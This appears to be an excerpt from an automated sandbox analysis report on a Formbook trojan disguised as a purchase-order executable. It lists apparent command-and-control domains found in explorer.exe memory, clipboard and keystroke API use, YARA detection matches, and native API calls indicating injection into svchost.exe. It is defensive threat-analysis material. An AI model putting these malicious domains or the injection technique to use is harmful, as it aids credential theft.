          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.ecurityemployment.today
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.ecurityemployment.today/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.ecurityemployment.today/ge07/www.wner-nyquh.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.ecurityemployment.todayReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.epehr.pics
          Source: explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.epehr.pics/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.epehr.picsReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.f7y2i9fgm.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.f7y2i9fgm.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.f7y2i9fgm.xyz/ge07/www.giyztm.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.f7y2i9fgm.xyzReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.g18q11a.top
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.g18q11a.top/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.g18q11a.top/ge07/www.rowadservepros.net
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.g18q11a.topReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giyztm.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giyztm.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giyztm.xyz/ge07/www.oal-ahzgwo.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giyztm.xyzReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lasterdeals.shop
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lasterdeals.shop/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lasterdeals.shop/ge07/www.zoc-marriage.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lasterdeals.shopReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oal-ahzgwo.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oal-ahzgwo.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oal-ahzgwo.xyz/ge07/www.epehr.pics
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oal-ahzgwo.xyzReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ostcanadantpl.top
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ostcanadantpl.top/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ostcanadantpl.top/ge07/www.rkgexg.top
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ostcanadantpl.topReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rkgexg.top
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rkgexg.top/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rkgexg.top/ge07/www.9net88.net
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rkgexg.topReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rowadservepros.net
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rowadservepros.net/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rowadservepros.net/ge07/www.dvle-father.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rowadservepros.netReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sfmoreservicesllc.lat
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sfmoreservicesllc.lat/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sfmoreservicesllc.lat/ge07/www.6282.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sfmoreservicesllc.latReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wner-nyquh.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wner-nyquh.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wner-nyquh.xyz/ge07/www.lasterdeals.shop
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wner-nyquh.xyzReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zoc-marriage.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zoc-marriage.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zoc-marriage.xyz/ge07/www.g18q11a.top
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zoc-marriage.xyzReferer:
          Source: explorer.exe, 00000003.00000002.3296660560.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2061373249.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3098294743.000000000C513000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000003.00000002.3289689202.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095465738.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2057742779.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000003.00000000.2059543443.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291923932.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000003.00000000.2057742779.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3289689202.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000003.00000003.3095718629.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2056323790.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3287820322.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
          Source: explorer.exe, 00000003.00000000.2059543443.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3292694913.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000003.00000000.2059543443.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3292694913.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000003.00000000.2061373249.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3296359647.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000003.00000002.3291923932.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
          Source: explorer.exe, 00000003.00000002.3291923932.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe | Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe | Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe | Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe | Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

          E-Banking Fraud

          Source: Yara match | File source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Purchase order MIPO2425110032.exe PID: 2520, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: Process Memory Space: svchost.exe PID: 1396, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: Process Memory Space: ipconfig.exe PID: 6000, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: initial sample | Static PE information: Filename: Purchase order MIPO2425110032.exe
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A320 NtCreateFile,2_2_0041A320
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A3D0 NtReadFile,2_2_0041A3D0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A450 NtClose,2_2_0041A450
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A500 NtAllocateVirtualMemory,2_2_0041A500
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A31D NtCreateFile,2_2_0041A31D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A44A NtClose,2_2_0041A44A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872BF0 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_03872BF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872B60 NtClose,LdrInitializeThunk,2_2_03872B60
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872AD0 NtReadFile,LdrInitializeThunk,2_2_03872AD0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872F90 NtProtectVirtualMemory,LdrInitializeThunk,2_2_03872F90
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872FB0 NtResumeThread,LdrInitializeThunk,2_2_03872FB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872FE0 NtCreateFile,LdrInitializeThunk,2_2_03872FE0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872F30 NtCreateSection,LdrInitializeThunk,2_2_03872F30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872E80 NtReadVirtualMemory,LdrInitializeThunk,2_2_03872E80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_03872EA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872DD0 NtDelayExecution,LdrInitializeThunk,2_2_03872DD0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03872DF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872D10 NtMapViewOfSection,LdrInitializeThunk,2_2_03872D10
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872D30 NtUnmapViewOfSection,LdrInitializeThunk,2_2_03872D30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872CA0 NtQueryInformationToken,LdrInitializeThunk,2_2_03872CA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03872C70
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03874340 NtSetContextThread,2_2_03874340
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03874650 NtSuspendThread,2_2_03874650
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872B80 NtQueryInformationFile,2_2_03872B80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872BA0 NtEnumerateValueKey,2_2_03872BA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872BE0 NtQueryValueKey,2_2_03872BE0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872AB0 NtWaitForSingleObject,2_2_03872AB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872AF0 NtWriteFile,2_2_03872AF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872FA0 NtQuerySection,2_2_03872FA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872F60 NtCreateProcessEx,2_2_03872F60
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872EE0 NtQueueApcThread,2_2_03872EE0
